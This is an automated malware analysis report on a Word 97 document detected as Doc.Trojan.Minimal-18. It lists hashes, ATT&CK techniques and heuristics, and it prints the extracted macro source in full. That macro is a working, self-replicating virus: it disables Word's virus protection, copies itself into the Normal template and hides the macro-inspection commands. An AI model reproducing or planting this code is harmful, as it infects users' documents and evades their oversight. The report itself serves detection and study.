Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ca17d2705fd8036…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 2000-08-23 02:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 310e2f20352babc4e0b653a706d92b85
SHA-1: 77beaf366022e98f09660e87dacaca0acccea915
SHA-256: 5ca17d2705fd8036de8325fa2be1717fe0c4b2ebbc7ddbb692dc01a08495612e
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and an AutoOpen macro, indicating an attempt to execute malicious code upon opening. The presence of the 'tot' macro and its use in AutoOpen suggests a mechanism for loading and potentially executing further stages. While the specific payload is not directly visible, the macro's structure and the ClamAV detection point towards a trojan.

Heuristics (4)

  • ClamAV: Doc.Trojan.Minimal-18 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Minimal-18
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  1776 bytes
SHA-256: de36d65f93065b63da96a8b802c9c4cbc49e957b478af1716e56e6e581091b38
Detection: ClamAV: Doc.Trojan.Minimal-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tot"
Sub AutoOpen()
    On Error Resume Next
    ' Suppress Ctrl+Break, hide the VB editor and disable Word's macro warning and Normal-template save prompt
    Application.EnableCancelKey = 0
    Application.ShowVisualBasicEditor = 0
    Options.VirusProtection = 0
    Options.SaveNormalPrompt = 0
    ' Copy the "tot" module into the Normal template, save it, then copy it back into the open document
    a = ActiveDocument.FullName
    n = NormalTemplate.FullName
    Application.OrganizerCopy Source:=a, Destination:=n, Name:="tot", Object:=wdOrganizerObjectProjectItems
    NormalTemplate.Save
    Application.OrganizerCopy Source:=n, Destination:=a, Name:="tot", Object:=wdOrganizerObjectProjectItems
    ActiveDocument.Save
End Sub
' Empty stubs shadow Word's built-in macro/Organizer commands so the user cannot inspect or record macros;
' FileSave re-runs AutoOpen on every save.
Sub ToolsRecordMacroToggle(): End Sub
Sub ToolsRecordMacroStart(): End Sub
Sub FileSave(): AutoOpen: End Sub
Sub FileTemplates(): End Sub
Sub ToolsMacro(): End Sub
Sub ViewVBcode(): End Sub
Sub Organizer(): End Sub

'         MMM            MMMMMMMMM                 MM
'       MMMMMMMM     MMMMMMMMMMMMMMMM          MMMMMM
'        MMMMMMMMMMMMMMM/"""""""\MMMMMMMMMMMMMMMMMMMMM
'         MMMMMMMMMMMMMM\______/MMMMMMMMMMMMMMMMMMMMMM
'         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
'         MMMM      MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
'         MMM        MMMMMMMMMMMMM           MMMMMMMMMM
'         MMM        MMMMMMMMMMM    RUSSIA     MMMMMMMM
'          MM         MMMMMMMM               M  MMMMMMM
'          MM        MMMMMMMMM             MMM   MMMMMM
'                   MMMMMMMMMMMMMM      MMMMM    MMMMMM
'          MM      MMMMMMMMMMMMMMMMMMMMMMMM       MMMM
'         MMMMMMMMMMMMMMMMMMMMMMMMMMMMM           MMMM
'        MMMMMMMMMM                                MM